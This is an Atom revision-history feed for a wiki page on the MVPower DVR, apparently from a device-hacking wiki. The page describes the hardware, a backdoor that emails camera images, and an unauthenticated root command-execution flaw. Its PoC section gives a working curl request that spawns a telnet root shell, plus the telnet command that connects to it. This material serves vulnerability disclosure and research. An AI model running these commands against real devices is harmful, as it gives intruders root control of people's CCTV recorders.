<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.exploitee.rs/index.php?action=history&amp;feed=atom&amp;title=MVPower_DVR</id>
	<title>MVPower DVR - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.exploitee.rs/index.php?action=history&amp;feed=atom&amp;title=MVPower_DVR"/>
	<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=MVPower_DVR&amp;action=history"/>
	<updated>2026-05-07T00:33:52Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.45.0-alpha</generator>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=MVPower_DVR&amp;diff=2932&amp;oldid=prev</id>
		<title>Bcoles: Created page with &quot;__FORCETOC__ {{Disclaimer}} 160px Category:DVR  = MVPower DVR =  MVPower DVR is a HDMI Full 960H H.264 real-time standalone...&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=MVPower_DVR&amp;diff=2932&amp;oldid=prev"/>
		<updated>2017-11-26T07:35:42Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} &lt;a href=&quot;/index.php?title=File:Mvpower-TV-7104HE-front.jpg&quot; title=&quot;File:Mvpower-TV-7104HE-front.jpg&quot;&gt;left|thumb|160px&lt;/a&gt; &lt;a href=&quot;/index.php?title=Category:DVR&quot; title=&quot;Category:DVR&quot;&gt;Category:DVR&lt;/a&gt;  = MVPower DVR =  MVPower DVR is a HDMI Full 960H H.264 real-time standalone...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Mvpower-TV-7104HE-front.jpg|left|thumb|160px]]&lt;br /&gt;
[[Category:DVR]]&lt;br /&gt;
&lt;br /&gt;
= MVPower DVR =&lt;br /&gt;
&lt;br /&gt;
MVPower DVR is a HDMI Full 960H H.264 real-time standalone network CCTV Digital Video Recorder available in 4 and 8 channel models (TV-7104HE / TV-7108HE).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Hardware ==&lt;br /&gt;
* Video System: PAL&lt;br /&gt;
* Video Compression: H.264&lt;br /&gt;
* Video Input: BNC 4 Channel or 8 Channel&lt;br /&gt;
* Video Output: 1 Channel BNC/VGA&lt;br /&gt;
* Storage Interface Type: SATA&lt;br /&gt;
* Max Capacity: Up to 2TB HDD (not included)&lt;br /&gt;
* USB Interface: USB 2.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Firmware ==&lt;br /&gt;
&lt;br /&gt;
An unofficial fork of the firmware was identified on GitHub. It has since been removed, however [https://github.com/cybergibbons/ipc a fork is available].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Teardown ==&lt;br /&gt;
&lt;br /&gt;
You can find an excellent teardown of the MVPower DVR at [https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/ labby.co.uk].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Backdoor ==&lt;br /&gt;
&lt;br /&gt;
It&amp;#039;s worth noting that this device contains a [https://www.pentestpartners.com/blog/pwning-cctv-cameras/ known backdoor] which sends still images from the connected cameras to an email address assumed to be maintained by the firmware developer - lawishere@yeah.net.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Remote Command Execution ==&lt;br /&gt;
&lt;br /&gt;
The web interface contains legacy debugging functionality which does not require authentication and allows trivial remote command execution as root. No patch is available.&lt;br /&gt;
&lt;br /&gt;
The first known report of this issue is from Paul Davies from UHF-Satcom in a comment on the [https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/ labby.co.uk blog] in August 2015.&lt;br /&gt;
&lt;br /&gt;
The TV-7104HE and TV-7108HE models are known to be vulnerable, however it&amp;#039;s likely that other models are also affected. The vulnerability was successfully exploited in firmware version 1.8.4 115215B9 (Build 2014/11/17).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== PoC ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
# Start the telnet daemon on port 443&lt;br /&gt;
curl -i &amp;quot;http://&amp;lt;IP&amp;gt;/shell?telnetd+-l+/bin/sh+-p+443&amp;quot; -H &amp;quot;Connection: Keep-Alive&amp;quot;&lt;br /&gt;
# Telnet to the newly started telnet daemon&lt;br /&gt;
telnet &amp;lt;IP&amp;gt; 443&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Exploits ===&lt;br /&gt;
&lt;br /&gt;
* [https://www.rapid7.com/db/modules/exploit/linux/http/mvpower_dvr_shell_exec An official Metasploit module] is available to gain a remote meterpreter shell as root.&lt;br /&gt;
&lt;br /&gt;
* [https://gist.github.com/bcoles/f4f528fa67c887d157be95d60d7fc9d2 An unofficial Metasploit module] exists which gains a remote root shell by starting the telnet daemon on a specified port.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Gallery ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Mvpower-TV-7104HE-front.jpg&lt;br /&gt;
File:Mvpower-TV-7104HE-back.jpg&lt;br /&gt;
File:Mvpower-TV-7104HE-board.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
&lt;br /&gt;
* [https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/ Cheap DVR teardown and pinout (MVPower, Hi3520D_v1.95p) – Labby.co.uk]&lt;br /&gt;
* [https://www.pentestpartners.com/blog/pwning-cctv-cameras/ Pwning CCTV cameras | Pen Test Partners]&lt;br /&gt;
* [http://convictech.blogspot.com/2016/01/mvpower-hd-cctv-camera-security-system.html ConvicTech: MVPower 4-Channel HD CCTV Camera Security System from Aukey E-Business]&lt;/div&gt;</summary>
		<author><name>Bcoles</name></author>
	</entry>
</feed>